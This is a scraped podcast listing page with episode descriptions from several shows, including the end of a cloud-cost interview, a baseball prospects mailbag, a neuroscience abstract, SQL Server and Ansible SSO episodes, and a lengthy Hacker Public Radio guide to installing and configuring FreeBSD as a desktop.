right?And so, it's been a really nice eight months. It's been wild. Learning AWS culture has been wild. It's a sharp diverging culture from where I've been in the past, but it's also really cool to experience the leadership principles in action. They're not just things we put on a website; they're actually things people talk about every day [laugh]. And so, that journey has been humbling and a great learning opportunity as well.Corey: If people want to learn more, where's the best place to find you?Rick: Oh, yeah. Contact me on LinkedIn or Twitter. My Twitter account is @rickyo1138. Let me know if you get the 1138 reference. That's a fun one.Corey: THX 1138. Who doesn't?Rick: Yeah, there you go. And it's hidden in almost every single George Lucas movie as well. You can contact me on any of those social media platforms and I'd be happy to engage with anybody that's interested in optimization, cloud technology, bill, anything like that. Or even not [laugh]. Even anything else, either.Corey: Thank you so much for being so generous with your time. I really appreciate it.Rick: My pleasure, Corey. It was wonderful talking to you.Corey: Rick Ochs, Principal Product Manager at AWS. I'm Cloud Economist Corey Quinn, and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an angry comment, rightly pointing out that while AWS is great and all, Azure is far more cost-effective for your workloads because, given their lack security, it is trivially easy to just run your workloads in someone else's account.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.Announcer: This has been a HumblePod production. Stay humble.

Locked On MLB Prospects
Monday Mailbag! How do the Milwaukee Brewers configure the outfield around Christian Yelich?

Locked On MLB Prospects

Play Episode Listen Later Nov 28, 2022 33:32


On today's show, we're answering your questions! Helmut asks about which outfield prospects get promoted in Milwaukee now that Hunter Renfroe was traded to the Angels, and does Esteury Ruiz finally get to play every day? Matt asks about the Chicago White Sox lineup, and we discuss internal (RF Oscar Colas) and external (Andrew Benintendi? Michael Conforto?) options to upgrade the lineup. Alex asks about how to go about studying prospects, while Don asks about reasonable expectations for a prep draftee and Jake asks about Matt McLain of the Cincinnati Reds and Tyler Black of the Milwaukee Brewers.   Find and follow LockedOn MLB Prospects on your favorite podcast platforms: Apple Podcasts: https://podcasts.apple.com/us/podcast/locked-on-mlb-prospects/id1525225214 Spotify: https://open.spotify.com/show/2wzJIf26tGgVbB7rsoKyLD Stitcher: https://www.stitcher.com/show/locked-on-mlb-prospects Follow along with LockedOn MLB Prospects host Lindsay Crosby as we follow 120+ affiliated teams throughout the 2022 season! From prospect call-ups to impactful trades to the ever evolving battle for minor league living and working conditions, Lindsay is covering it all on five days a week. Available exclusively on the Locked On Podcast Network. Follow the show on twitter @LockedOnFarm and email your Mailbag Monday questions to LockedOnMLBProspects@gmail.com Follow Lindsay for up to the minute details on all things Minor League Baseball: On Twitter: https://twitter.com/CrosbyBaseball Support Us By Supporting Our Sponsors! Built Bar Built Bar is a protein bar that tastes like a candy bar. Go to builtbar.com and use promo code “LOCKEDON15,” and you'll get 15% off your next order. BetOnline BetOnline.net has you covered this season with more props, odds and lines than ever before. BetOnline – Where The Game Starts! SimpliSafe With Fast Protect™️ Technology, exclusively from SimpliSafe, 24/7 monitoring agents capture evidence to accurately verify a threat for faster police response. There's No Safe Like SimpliSafe. Visit SimpliSafe.com/LockedOnMLB to learn more. Learn more about your ad choices. Visit podcastchoices.com/adchoices

PaperPlayer biorxiv neuroscience
Large-scale signal and noise correlations configure multi-task coding in human brain networks

PaperPlayer biorxiv neuroscience

Play Episode Listen Later Nov 24, 2022


Link to bioRxiv paper: http://biorxiv.org/cgi/content/short/2022.11.23.517699v1?rss=1 Authors: Ito, T., Murray, J. D. Abstract: The brain is a complex system with dynamic network changes. Prior studies in theoretical neuroscience have demonstrated that state-dependent neural correlations can be understood from a neural coding framework. These so-called noise correlations - the trial-to-trial or moment-to-moment co-variability - can be interpreted only if the underlying signal correlation - the similarity of task selectivity between pairs of neural units - is known. While the impact of these correlations on task coding have been widely investigated in local spiking circuits, it remains unclear how this coding framework applies to large-scale brain networks. Here we investigate the relationship between large-scale noise correlations and their underlying signal correlations in a multi-task human fMRI dataset. We found that state-dependent noise correlation changes do not typically align in the same direction as their underlying signal correlation, suggesting that 1) trial-by-trial noise is typically reduced between similarly tuned regions, and 2) stimulus-driven activity does not linearly superimpose atop the network's underlying background activity. Crucially, we discovered that noise correlations that changed in the opposite direction as their signal correlation (i.e., anti-aligned correlations) improved the information coding of these brain regions. In contrast, noise correlation changes that were aligned with their signal correlation did not. These aligned noise correlations were primarily correlation increases, which have been commonly (yet incorrectly) assumed to increase information communication between brain regions in human neuroimaging studies. These findings illustrate that state-dependent noise correlations contribute to the information coding of functional brain networks, but interpretation of these correlation changes requires knowledge of the underlying signal correlations. Copy rights belong to original authors. Visit the link for more info Podcast created by Paper Player, LLC

SQL Server רדיו
פרק 152 - סינכרונים ואסוציאציות

SQL Server רדיו

Play Episode Listen Later Nov 6, 2022 35:15


גיא ואיתן מתחילים בדיון בהקשר של Availability Group וזורמים לפי אסוציאציות לנושאים נוספים ומעניינים. קישורים רלוונטיים: Configure read-only routing for an Always On availability group Clusterless Read-Scale Availability Groups Azure SQL Database elastic query and sharding overview (preview) CREATE EXTERNAL TABLE (Transact-SQL) Serverless SQL pool in Azure Synapse Analytics Data Virtualization with PolyBase for SQL Server 2022 CREATE EXTERNAL TABLE AS SELECT (Transact-SQL) SQL Server 2022 Release Candidate 1 is now available Intelligent Query Processing: degree of parallelism feedback Don't miss out on attending PASS Data Community Summit 2022

AppleVis Podcast
Quick Tip: How to Configure VoiceOver to Start Automatically when Logging into Your Mac

AppleVis Podcast

Play Episode Listen Later Nov 5, 2022


By default, VoiceOver does not start automatically at the macOS login prompt. In this podcast, Tyler demonstrates how to change this. The steps to do so are as follows:Choose Apple > System Settings, and select Lock Screen in the table.Click accessibility options and toggle the “VoiceOver” switch on.Click done.If FileVault disk encryption is turned on, which is the default, VoiceOver should start when the Mac boots and prompt for the username, and then prompt for the password if the username is entered correctly. However, if you'd rather not have to manually enter your username or be able to navigate other elements in the window, you must turn FileVault off. To do this, open System Settings, select Privacy & Security in the table, and click “FileVault turn off.”

Hacker Public Radio
HPR3718: Making Ansible playbooks to configure Single Sign On for popular open source applications

Hacker Public Radio

Play Episode Listen Later Nov 2, 2022


This is a recording of a short introduction into my latest project. To help sysadmins everywhere the Onestein organization (an organization specialized in Odoo implementations) invested 4 month of research to create a set of easy to use Ansible playbooks to configure single sign on (SSO) for popular open source applications to enable them to authenticate to a Keycloak server as the central identity provider. These playbooks have been published on https://github.com/onesteinbv/project_single_sign_on. The list of supported applications are currently: Bitwarden Jenkins Gitlab Keycloak (not SSO, but the identity provider) Nextcloud Odoo Xwiki Zabbix All playbooks and servers are for Ubuntu servers and are meant to be used as a starting point. 5 minute YouTube talk at the 2022 Nextcloud conference about this project: https://www.youtube.com/watch?v=pDPKzo8Bi10

Fueling Deals
Episode 196: Two Can Be Better Than One: A&M and Building Boards with Brad Feld & Matt Blumberg

Fueling Deals

Play Episode Listen Later Oct 26, 2022 56:43


When discussing entrepreneurialism and venture capital, sometimes the conversation can be greatly beneficial when it's opened to beyond just two people. On episode 196 of the DealQuest Podcast, Corey does just that – he's opened the conversation to include two successful and talented entrepreneurs- Brad Feld and Matt Blumberg. They discuss the many intricate details of entrepreneurialism, venture capital, starting and running a company, and so much more. BRAD FELD Brad Feld got his entrepreneurial start in college when he founded his first company, Feld Technologies. This has allotted Brad over 35 years of entrepreneurial experience, which has been greatly beneficial to his co-founding of the company Techstars. Not only that, but working in tandem with his wife, Amy Batchelor, they run the Anchor Point Foundation. Not only is Brad actively engaged with entrepreneurialism, but he's also written several books on entrepreneurship and venture capital, as well as began blogging in 2004 on these topics. At present, you can find him on Twitter, sharing his knowledge in the niche corner of “VC Twitter”. “VC Twitter” – aka Venture Capital Twitter – is a community of people who utilize the social media platform's tools and broad communication to discuss venture capital, and come together to exchange education, knowledge, and resources. MATT BLUMBERG Like Brad, Matt Blumberg is a long-time, successful entrepreneur, author, and business owner. Unlike Brad, Matt's expertise is being a technology entrepreneur. Brad is also the CEO of Bolster, an on-demand executive talent marketplace, designed to help accelerate companies' growth. They focus on this growth by connecting companies with highly vetted executives for the interim, fractional, advisory, project-based, or board roles. Matt's experience spans back over 30 years in marketing, consulting, and venture capital. Having built, founded or chaired several successful businesses to date, including PathForward.org, Oblong Inc., and Return Path Inc. Matt's success in entrepreneurialism doesn't just stop at his personal achievements in business, but also his knowledge and skill in business has been recognized by Business Insider as one of New York's 100 most influential technology leaders, by Crain's as one of New York's Top Entrepreneurs, and by Ernst & Young as an Entrepreneur of the Year finalist. THE PROGRESSION OF BUSINESS RELATIONSHIPS Brad has been in the business of entrepreneurialism since the mid-80s, a lot has changed. When selling his first business, Brad was taken under the wing of two successful dealmakers of their time, who taught him some of the base tenements of deal-making. Their style of deal-making fell out of favor with the advent of the digital age – wherein things can become quite impersonal – but Brad prefers to keep it a bit “old school”. Simply meaning, he believes in keeping deal-making as a relationship – personal, and beneficial to both parties. Focus on building the relationship and an understanding – AKA: a “handshake agreement” – before putting things down on paper. Focus on the things that matter in the context of making a deal, versus all the minutiae that can convolute and distract from making a successful deal. Be simple and straight-forward about what you want to achieve in the deal, and what matters most to you. During the infancy of the internet, Matt was on the executive team for a then-small cap public company, Moviefone. Matt was alongside the CEO and CFO during the dealmaking process of selling Moviefone to AOL. He, too, attests to the importance of focusing on the relationship between professionals throughout the entire deal-making process. Ironically, the sale of Moviefone began over a handshake in a movie theater during the premiere of You've Got Mail. Matt spent 20 years building the company, Return Path Inc., with Brad spending 19 years on the board. Return Path Inc. was sold in 2019, however a potential deal two years prior almost came to fruition. Matt asserts that the former deal failed, and the 2019 deal was successful, ultimately because he knew the CEO of the eventual buyer, and he did not have a relationship with the earlier bidder. Thus, corroborating the importance of having a growing relationship between dealmakers throughout the deal-making process. INVESTING FOR ORGANIC GROWTH Brad began to develop his serial entrepreneurial skills by getting in on the ground floor of new-age seed investments by quickening his pace, and investing in a new company each month, something almost entirely unheard of in the mid-90s at the beginning of the commercial internet, wherein most seed-investors played a slow and steady game with their investments. With the birth of the internet-age in the mid- to late-90s, new businesses in tech began to spring up like weeds, and Brad took this newly flourishing market to begin making angel investments. He used virtually 100% of the profits he made from selling his first company to make a series of angel investments in the infancy of tech businesses. He also positioned himself to be on the company boards, and in some instances, even co-founding the company. For Brad, his ability to become an angel investor, combined with his strategic positioning within the companies, opened a lot of doors, leading into some of the more well-known VC businesses of today. ACQUISITION FOR INORGANIC GROWTH While investing capital into a company to build equity is a good path to build organic growth, another valuable way to build growth, for some, is inorganically. By taking a smaller company, acquiring other smaller companies, to the point that the growth becomes a chain link of acquisitions that build a larger company. IE: Company A acquires Company B to make Company C, Company C acquires Company D to become Company E, and so on and so forth. The goal of growing a business is to always be additive to what you already have. In the business of inorganic growth, it's important to only seek companies that can add to what you've already built – it won't always work out successfully, but the goal is always to remain in forward momentum. Especially as a buyer, you can't be afraid of making a mistake, making a bad deal, or acquiring a business that ends up not being additive to your core company. Brad's anecdotal evaluation on acquisitions is a half-joke passed to him from his mentor: “Would you buy it for a dollar?” If the answer is yes: then there's something to talk about; investigate the potentiality. If the answer is no: then, perhaps it's best to move on. As Brad says, “When you ask that question, [you find] there's a lot of stuff you wouldn't buy for a dollar.” This rule applies to the acquisitions of companies. Frankly, if you wouldn't spend money on it, why are you entertaining the idea of spending money on it? When Matt was looking for investors for Return Path Inc. around the time of the dot-com bubble and collapse, another small company – that just so happened to have Brad on the executive board – was also at the doorstep of the same investment company. The investment company compared the two businesses, and noted that they were fundamentally the same. The deal then became merging the two like-companies into one larger company, with Return Path Inc. becoming the acquisitioner. While Matt recollects that deal in one way, Brad recalls his view somewhat differently, which revolves back to, and is another testimony of, the importance of building relationships in dealmaking with authenticity. Depending on your position approaching the deal, and your position within the respective companies, your field of vision on the deal may vary, and good practice is to keep in mind all the potentially differing viewpoints. RISK ASSESSMENT FOR GROWTH Within business there is always a risk curve. You want to post yourself in a comfortable area of this risk curve, especially at the start of any new deal potential. Your deal should be primarily about generating upside, not mitigating risk: Keep your dealmaking to principal players only: when you begin to open the deal up to non-principal players, your risk will increase. Be unafraid to take risks. Be aware of risks, and take inventory of risks, but do not focus entirely on evaluating risk factors. Do not lose sight of the vision of the deal. If you're a principal in a deal process, do not defer to others, nor hide behind your lawyers Try to keep the deal as engaged and collaborative as possible (IE: as the deal initiator, do your best to continue to nurture the relationship throughout the entire process, and if your counterpart is seeming to defer out, check in with them; make sure they're remaining engaged, as well). Do your pre-due diligence. * for more on pre-due diligence, check out Lesson 2: How to Prepare for Deals in the Deal-Driven Growth Accelerator course Understand there are no successful deals without some risk involved THE PATHWAY TO BUILDING A BOARD While Matt has authored, with contributions from Brad, two other books on this subject, Matt and Brad jointly constructed Startup Boards: A Field Guide to Building and Leading an Effective Board of Directors, released in June 2022. Matt asserts that the startup market is oversaturated with new entrepreneurs, most of whom have never started a business, let alone have built an entire board. That's the intent of Startup Boards: Focusing on the unassailable fact that competition to get noticed in the startup market is tight, and it takes making the right choices to get noticed by potential investors. Board-building is no easy feat. Many of the things addressed in Startup Boards are designed to make entrepreneurs think about their board and evaluate: Build a board deliberately and with intention. Configure a board that is healthy, and functions as a team. Bring in professionals that don't merely invest in the company, but are proficient in the company's space, and how to direct a company within that space. Be cautious of how many founders are on the board (in most scenarios, the fewer the better, in Matt's opinion). Startup Boards is intended to serve as a field guide for all these entrepreneurs wading the harsh waters of startup and board building, and offer them guidance and a hand up to building their successful company board. They want and expect the reader to dog-ear and reference back to Startup Boards like a map, as the reader journeys through the world of startup and board-building, with hopes of becoming one of the success stories everyone hears about. • • Reach out to Brad Feld for more:https://feld.com/https://onboards.libsyn.com/ Reach out to Matt Blumberg for more:startupceo.comlinkedin.com/in/blumbergmatt • • Corey Kupfer is an expert strategist, negotiator, and dealmaker. He has more than 35 years of professional deal-making and negotiating experience. Corey is a successful entrepreneur, attorney, consultant, author, and professional speaker. He is deeply passionate about deal-driven growth. He is also the creator and host of the DealQuest Podcast. If you want to find out how deal-ready you are, take the Deal-Ready Assessment today!

Hacker Public Radio
HPR3705: The Year of the FreeBSD Desktop

Hacker Public Radio

Play Episode Listen Later Oct 14, 2022


Getting an installer Link to FreeBSD downloads Choose the correct arch for your system. amd64 is probably the one you want if you know nothing about computer architectures. you will have a lot of options: *-bootonly.iso is a netinstall image that is for burning to a CD *-disc1.iso is a supplementary CD image for *-bootonly.iso *-dvd1.iso is a complete DVD image with extra packages *-memstick.img is a complete image for burning to a USB stick *-mini-memstick.img is a netinstall image for burning to a USB stick I typically download and use one of the compressed memstick images. The mini image is fine but you probably want the regular memstick image if this is the first time you've ever installed FreeBSD. It alleviates some of the stress that comes with installing wireless drivers. To burn a memstick image, use the disk destroyer program: root@fbsd# xunz FreeBSD-13.1-RELEASE-amd64-memestick.img.xz root@fbsd# sudo dd if=./FreeBSD-13.1-RELEASE-amd64-memestick.img of=/dev/sdx status=progress root@fbsd# sudo eject /dev/sdx Initial installation pre-installation The standard steps for installing Linux apply: disable secure boot enable USB booting select boot device at startup time Because this is hardware specific, it's a homework assignment for the audience. Installation FreeBSD has a menu driven installer that walks the user through various steps: 1. set keymap (leave default if you don't know) 2. set hostname 3. select sets There are many sets to choose from. New users probably want to install all of them. I typically only install the lib32 set and add the rest later. 4. Partitioning bsdinstall makes it easy to partition your drives. The Auto(ZFS) option is probably what you want as the default UFS configuration is unjournaled. In the Auto(ZFS) menu, for a single hard drive installation, you want to stripe one disk. Select your hard drive. If you want full disk encryption, select the Encrypt Disks option. You also want to bump up the swap size to ram*1.5 as a general rule (so, for 4g of ram you will set 6g of swap, for 8g or ram you set 12g swap). If you selected Encrypt Disks, you should also select Encrypt Swap When you are done, proceed with the installation. You will gt a confirmation message asking if you want to destroy the disk(s) you selected. This is your last chance to go back. If you selected Encrypt Disks, you will be presented with a password prompt. This is the disk encryption password, not any user password. 5. Wait for sets to install 6. Configure root user After the sets are installed, you will set a root password. 7. Network Config If your wireless card is supported, all the hard parts are already done for you. If your wireless card is not supported, you might need to plug in an ethernet cable and compile the drivers into the kernel. Select your card (em* is ethernet, wifi cards are named after their drivers) If you choose wifi, the installer will scan for networks and give you a menu to select one. If the network is encrypted, you will be presented with a password prompt. 8. Time and date setup 9. Service setup You will be presented with a menu that enables/disables services on system startup. You probably want all of them except local_unbound. 10. Security config The next menu enables/disables security features. If nothing else, select disable_sendmail and clear_tmp 11. Add users Simply add your user. You might want to add him to the wheel group if you plan on using sudo. I set my shell to tcsh but you can always change this later. A 12. Final configuration You may want to install the handbook or modify any configurations you've made so far. This will take some time. When you are done, apply the config and exit. 13. Manual config Before you reboot the system and exit the installer, you are given a last opportunity to make any manual configurations. This is rarely needed for the average desktop user. Post installation What, no GUI? Update system Login as root and update the system: root@fbsd# freebsd-update fetch root@fbsd# freebsd-update install root@fbsd# reboot Installing packages Before we begin modifying the system, we need a better editor. The pkg utility is used in a nearly identical way to any Linux package manager. The syntax pkg $verb $object persists. Verbs include install, remove, update, upgrade, search, etc. Because the only editors installed by default are vi, ed, and ee, let's install vim. There are multiple vim flavors, I like vim-tiny. root@fbsd# pkg bootstrap root@fbsd# pkg update root@fbsd# pkg search vim root@fbsd# pkg install vim-tiny We probably want sudo (or doas) also: root@fbsd# pkg install sudo root@fbsd# visudo Find the line that says: # %wheel ALL=(ALL:ALL) ALL and move the # from the beginning of the line to enable the wheel group to do actions as root. Bootloader tweaks We can tweak the bootloader to make the system more desktop-like. Edit /boot/loader.conf # /boot/loader.conf # ----------------- [ lots of default stuff ] # custom stuff # boot faster autoboot_delay=2 Refer to loader.conf(5) for more tweaks and /boot/defaults/loader.conf for examples. init tweaks We can tweak the init system also. Edit /etc/rc.conf # /etc/rc.conf # ----------------- [ lots of default stuff ] # enable graphics kld_list="i915kms" # faster booting background_dhclient="YES" See rc.conf(5) and /etc/defaults/rc.conf for more information on what you can do. Snapshotting a sane fresh installation At this point, it is wise to take a recursive snapshot of your FreeBSD installation. This provides us with an easy way to roll back to a fresh, known working system configuration. root@fbsd# zfs snapshot -r zroot@freshinstall root@fbsd# zfs list - tsnapshot If the system becomes unrepairable, we can simply rollback instead of reinstalling with a simple command: root@fbsd# zfs rollback -r zroot@freshinstall To rollback every dataset, we can use xargs: root@fbsd# zfs list -t snapshot | grep freshinstall | cut -d ' ' -f 1 | xargs -I % zfs rollback % Using zfs snapshots before and after making any potentially dangerous configuration changes saves a lot of headache in the long run because zfs is accessible from the recovery shell. Rollback with caution, user data may be lost. Homework assignment: write a series of cron jobs that automatically takes snapshots (and cleans up the old ones) of user data as a form of last line of defense version control Graphical user interfaces Install graphics drivers This varies depending on your GPU. root@fbsd# pkg install drm-kmod After installing this package, you will see a message on how to enable the driver for your specific hardware: For amdgpu: kld_list="amdgpu" For Intel: kld_list="i915kms" For radeonkms: kld_list="radeonkms" To enable one of these, you will need to add a line to your /etc/rc.conf. The earlier you place this line in the file, the sooner the kmods will load. For intel graphics, for example, you will add the following line: # /etc/rc.conf # ----------------- [ lots of other stuff ] # intel graphics drivers kld_list="i915kms" To load the kmod on the fly (for larger resolution vt), run: root@fbsd# kldload i915kms You will also need to add your non-root user to the video group. root@fbsd# pw groupmod video -m $user Audio (hopefully) audio will just work. Supported audio interfaces are enumerated in man snd(4) and details on enabling/disabling drivers in /boot/lodaer.conf are also explained. To manage volume, use the mixer command. For example, setting the mic volume to 50% and the speaker volume to 95%: user@fbsd% mixer mic 50:50 user@fbsd% mixer vol 95:95 The mixertui command can also be used. This program functions similarly to alsamixer on Linux. Depending on your hardware, the volume keys on your keyboard might not work. Adding a keybinding to a shell script is the usual solution and should be familiar to anyone who uses a desktop free window manager. Getting xorg root@fbsd# pkg install xorg The twm window manager is included with xorg by default. We can use it for testing our xorg configuration, mouse support, etc before continuing with larger desktop environments. Early troubleshooting always prevents foot shooting. Test early, test often. root@fbsd# startx Desktop Environments Refer to The handbook's instructions on desktops for instructions on non-suckless (ie suckmore setups). I have tested some of them on FreeBSD. KDE and Xfce are reliable. GNOME is mostly reliable. If you are running a big DE, you might have to modify polkit rules to do things like reboot the system from the GUI. Many larger desktops rely on FreeDesktop.org components. I personally do not like dbus so instead I use the suckless tools. But, for the sake of completeness, I will install a few for the masses. I installed each one of these independently and sequentially on the same system using zfs snapshots to roll back to a bare bones system without any DE installed. GNOME root@fbsd# pkg install gnome root@fbsd# printf 'proct/proctprocfstrwt0t0n' >> /etc/fstab root@fbsd# sysrc dbus_enable="YES" root@fbsd# sysrc gdm_enable="YES" root@fbsd# sysrc gnome_enable="YES" root@fbsd# reboot KDE root@fbsd# pkg install kde5 sddm root@fbsd# printf 'proct/proctprocfstrwt0t0n' >> /etc/fstab root@fbsd# sysrc dbus_enable="YES" root@fbsd# sysrc sddm_enable="YES" root@fbsd# reboot Xfce root@fbsd# pkg install xfce xfce4-goodies root@fbsd# sysrc dbus_enable="YES" Xfce does not provide it's own login manager, unlike GNOME or KDE. Let's pick lightdm because it's small and the graphical toolkit matches Xfce. root@fbsd# pkg install lightdm-gtk-greeter root@fbsd# sysrc lightdm_enable="YES" root@fbsd# reboot Suckless suckless: tools that suck less. This is how I use FreeBSD (and how I use most computers). I wrote a makefile that modifies the compile options so that the tools will build on FreeBSD and (optionally) adds the theme I use. You can find my suckless duct tape in this git repo. I also use xdm because it's small and fast. user@fbsd% sudo pkg install xdm user@fbsd% sudo service xdm enable A final note on desktops Sometimes desktops behave unexpectedly on FreeBSD (ie users cannot manage power settings, reboot the system, etc). Make sure your login user is in the wheel group (it's your computer, you probably are already in the wheel group) and most of the issues will be resolved. For users you don't want in the wheel group, you'll need to write a few polkit rules. Additionally, big desktops are typically compiled without the graphical components for modifying network connections. Similar to Arch or Gentoo, there is a bit of legwork left to the end user. You'll never know what you might learn about systems administration if you don't wilfully give yourself the opportunity. Shell tweaks I like colors in the shell for systems I use regularly. I also like aliases. We can modify our csh configuration file to automatically do the fancy for us. # ~/.cshrc # ----------------- [ lots of stuff ] # prompt section if ($?prompt) then # An interactive shell -- set some stuff up #set prompt = "%N@%m:%~ %# " #set prompt = "%{33[31m%}%N@%m:%~ %#%{33[0m%} " set prompt = "%{33[1m%}%N@%m:%~ %#%{33[0m%} " set promptchars = "%#" set filec set history = 1000 set savehist = (1000 merge) set autolist = ambiguous # Use history to aid expansion set autoexpand set autorehash set mail = (/var/mail/$USER) if ( $?tcsh ) then bindkey "^W" backward-delete-word bindkey -k up history-search-backward bindkey -k down history-search-forwarrd bindkey "^R" i-search-back endif endif # alias section alias la ls -aF alias lf ls -FA alias ll ls -lAF alias ls ls -GF alias lc ls -GF Some other packages The things I like: user@fbsd% sudo pkg install firefox gimp feh mpv ffmpeg ImageMagick7 mutt newsboat If you install a large DE, most of the applications are pulled in as well. If not, you can always use xargs to pull in hundreds of gigabytes of programs: user@fbsd% sudo pkg search $desktop | cut -d ' ' -f 1 | xargs sudo pkg install -y Going GNU: user@fbsd% sudo pkg install coreutils emacs bash gcc gmake Do a few package searches. What you want is probably there. If not, time to start porting :) Once you have everything configured how you want it, it's a good time to take another zfs snapshot. Quickstart Init system Instead of systemd, FreeBSD uses rc scripts for starting and stopping services. Everything is pretty much shell scripts. To modify the startup process, you simply edit /etc/rc.conf in a text editor. For systemctl like starting/stopping/enabling, you can do the following: root@fbsd# service sshd enable root@fbsd# service sshd start root@fbsd# service sshd restart root@fbsd# service sshd stop root@fbsd# service sshd disable root@fbsd# service sshd onestart root@fbsd# service sshd status Each service has it's own init file so sometimes a specific service might take different arguments than the standard ones you might expect. Networking Network interfaces are configured classically using ifconfig(8). If you want a network interface to persist across reboots, you add the information in /etc/rc.conf. WiFi is managed with wpa_supplicant. Refer to man wpa_supplicant.conf(8) for more information. Firewall use the pf firewall, I like it General upgrade process root@fbsd# pkg update && pkg upgrade root@fbsd# freebsd-update upgrade -r 13.1-RELEASE root@fbsd# freebsd-update install root@fbsd# reboot root@fbsd# freebsd-update install root@fbsd# pkg update && pkg upgrade root@fbsd# freebsd-update install root@fbsd# reboot Shells FreeBSD uses tcsh(1) as the default shell and includes sh(1) for bourne-like compatibility. You can install bash if you want. Package management There are two primary ways of managing software: binary packages and ports. Don't mix them if you don't know what you're doing, it can cause problems. To be brief: ports are like Gentoo. You spend a lot of time watching compiler output. The following programs help: synth, portmaster, poudriere. to be verbose: here is a quick guide on using the binary package management system: pkg update pkg upgrade pkg search foobar pkg install foobar pkg remove foobar pkg autoremove As you can see, the syntax is nearly identical to dnf or apt. Filesystem The hierarchy of FreeBSD is slightly different than a typical Linux system. Refer to man hier(7) for more information. The biggest difference is that FreeBSD a logically organized system. For example: On Linux, everything seems to end up in /bin (which is a symlink to /usr/bin). Additionally, /sbin is just a symlink to /usr/sbin. On FreeBSD, the system is more organized. For example: /bin contains everything required to boot the system and /sbin contains everything required for fundamental administration. /usr/bin contains most everything else /usr/local contains everything installed by the package management system. User installed programs are configured in /usr/local/etc. This might be confusing at first but you'll get the hang of it. This logical separation might cause confusion when compiling software from source on FreeBSD but it's not too difficult to solve if you already know how about linker options and makefile modification. As for filesystems, apparently ext2, ext3, and ext4 have read/write support using the ext2fs(5) driver. I probably wouldn't boot from them but this exists. UFS is not journaled by default, proceed with caution. ZFS is very good. ZFS non-starter ZFS is cool because we can create partitions on a whim. Here is some shell output demonstrating listing datasets, creating datasets with a quota, destroying datasets, creating and using encrypted datasets, etc. root@freebsd:/ # root@freebsd:/ # zfs list NAME USED AVAIL REFER MOUNTPOINT zroot 3.97G 434G 96K /zroot zroot/ROOT 3.82G 434G 96K none zroot/ROOT/13.1-RELEASE_2022-09-18_143644 8K 434G 1.07G / zroot/ROOT/default 3.82G 434G 3.71G / zroot/tmp 208K 434G 112K /tmp zroot/usr 157M 434G 96K /usr zroot/usr/home 157M 434G 157M /usr/home zroot/usr/ports 96K 434G 96K /usr/ports zroot/usr/src 96K 434G 96K /usr/src zroot/var 1.04M 434G 96K /var zroot/var/audit 96K 434G 96K /var/audit zroot/var/crash 96K 434G 96K /var/crash zroot/var/log 424K 434G 300K /var/log zroot/var/mail 192K 434G 128K /var/mail zroot/var/tmp 160K 434G 96K /var/tmp root@freebsd:/ # zfs list -t snapshot NAME USED AVAIL REFER MOUNTPOINT zroot@freshinstall 64K - 96K - zroot/ROOT@freshinstall 0B - 96K - zroot/ROOT/13.1-RELEASE_2022-09-18_143644@freshinstall 0B - 1.07G - zroot/ROOT/default@2022-09-18-14:36:44-0 76.7M - 1.07G - zroot/ROOT/default@freshinstall 35.0M - 1.21G - zroot/tmp@freshinstall 96K - 112K - zroot/usr@freshinstall 0B - 96K - zroot/usr/home@freshinstall 96K - 128K - zroot/usr/ports@freshinstall 0B - 96K - zroot/usr/src@freshinstall 0B - 96K - zroot/var@freshinstall 0B - 96K - zroot/var/audit@freshinstall 0B - 96K - zroot/var/crash@freshinstall 0B - 96K - zroot/var/log@freshinstall 124K - 188K - zroot/var/mail@freshinstall 64K - 96K - zroot/var/tmp@freshinstall 64K - 96K - root@freebsd:/ # zfs create zroot/crypt root@freebsd:/ # zfs set quota=5g zroot/crypt root@freebsd:/ # zfs list zroot/crypt NAME USED AVAIL REFER MOUNTPOINT zroot/crypt 96K 5.00G 96K /zroot/crypt root@freebsd:/ # zfs destroy zroot/crypt root@freebsd:/ # zfs create -o encryption=on -o keylocation=prompt -o keyformat=passphrase zroot/crypt Enter new passphrase: Re-enter new passphrase: root@freebsd:/ # zfs list zroot/crypt NAME USED AVAIL REFER MOUNTPOINT zroot/crypt 200K 434G 200K /zroot/crypt root@freebsd:/ # touch /zroot/crypt/supersecret root@freebsd:/ # ls /zroot/crypt/ supersecret root@freebsd:/ # zfs get encryption zroot/crypt NAME PROPERTY VALUE SOURCE zroot/crypt encryption aes-256-gcm - root@freebsd:/ # zfs unmount zroot/crypt root@freebsd:/ # zfs unload-key -r zroot/crypt 1 / 1 key(s) successfully unloaded root@freebsd:/ # zfs mount zroot/crypt cannot mount 'zroot/crypt': encryption key not loaded root@freebsd:/ # zfs get keystats zroot/crypt root@freebsd:/ # zfs get keystatus zroot/crypt NAME PROPERTY VALUE SOURCE zroot/crypt keystatus unavailable - root@freebsd:/ # zfs load-key -r zroot/crypt Enter passphrase for 'zroot/crypt': zfs 1 / 1 key(s) successfully loaded root@freebsd:/ # zfs mount -a root@freebsd:/ # ls /zroot/crypt/ supersecret A conclusion Really, I think FreeBSD is a viable desktop operating system for the types of people who already use Linux in a terminal-centric capacity. After all, UNIX is UNIX. Other stuff Running Firefox inside of a jail Another way to run Firefox inside of a jail FreeBSD Distros that come with a desktop out of the box: GhostBSD - FreeBSD with MATE HelloSystem - FreeBSD with an Apple-like GUI (still in development) MidnightBSD - FreeBSD with Xfce and a different package management system NomadBSD - Live GUI FreeBSD with OpenBoX

InfosecTrain
How to Configure Azure Front Door Service as an Application Gateway | InfosecTrain

InfosecTrain

Play Episode Listen Later Oct 7, 2022 13:54


Microsoft's cutting-edge cloud Content Delivery Network (CDN), Azure Front Door, offers quick, dependable, and secure access between your users and the static and dynamic online content of your apps around the world. Microsoft's global edge network, which has hundreds of local and international POPs spread across the globe close to your business and consumer end users, is used by Azure Front Door to serve your content. Learn how to configure Azure Front Door service as an Application Gateway. #applicationgateway #azureapplicationgateway #applicationgatewayfirewall #CDN #cloudcdn #infosectrain ✅Our Official Website - https://www.infosectrain.com/ ✅For more details or free demo with out expert write into us at sales@infosectrain.com Subscribe to our channel to get video updates. Hit the subscribe button above. Facebook: https://www.facebook.com/Infosectrain/ Twitter: https://twitter.com/Infosec_Train LinkedIn: https://www.linkedin.com/company/infosec-train/ Instagram: https://www.instagram.com/infosectrain/ Telegram: https://t.me/infosectrains

Hacker Public Radio
HPR3686: Followup for HPR3675: Clarifications on the path traversal bug

